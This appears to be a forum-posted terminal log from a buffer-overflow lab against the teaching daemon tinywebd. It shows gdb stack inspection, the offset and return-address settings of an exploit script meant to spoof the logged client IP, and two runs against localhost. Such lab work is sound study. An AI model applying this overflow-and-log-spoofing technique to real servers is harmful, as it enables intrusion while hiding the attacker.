(gdb) x/xw &client_addr_ptr
0xbffff6d4: 0xbffff4cf
(gdb) x/xw &log
log_buffer  logfd      
(gdb) x/xw &logfd
0xbffff6d8: 0x00000a00
(gdb) x/4xb &logfd
0xbffff6d8: 0x00 0x0a 0x00 0x00
(gdb) x/8xb &client_addr_ptr
0xbffff6d4: 0xcf 0xf4 0xff 0xbf 0x00 0x0a 0x00 0x00
(gdb) p logfd
$5 = 2560
(gdb) quit
A debugging session is active.

 Inferior 1 [process 2282] will be detached.
 
Quit anyway? (y or n) y
Detaching from program: /home/tomovic/Dokumente/hack/tinywebd, process 2282
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

 

------------Terminal 2-------------
Bitte die Werte in eurer .sh ändern !!!

# Excerpt of the settings in xt_spoof.sh that the gdb session above verifies.
# RETADDR and FAKEADDR are hard-coded absolute stack addresses derived from
# the buffer address 0xbffff4c0. They stay valid only while the target's stack
# layout is identical on every run, which stack randomisation (ASLR) is
# designed to prevent.
# NOTE(review): presumably ASLR is disabled in this lab setup; confirm.
OFFSET=524
RETADDR="\x24\xf5\xff\xbf" # 0xbffff524 in little-endian byte order: +100 bytes from buffer @ 0xbffff4c0
FAKEADDR="\xcf\xf4\xff\xbf" # 0xbffff4cf in little-endian byte order: +15 bytes from buffer @ 0xbffff4c0; the same value gdb prints for client_addr_ptr

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_spoof.sh mark_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 316] [shellcode 53] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_spoof.sh mark_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 316] [shellcode 53] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

   
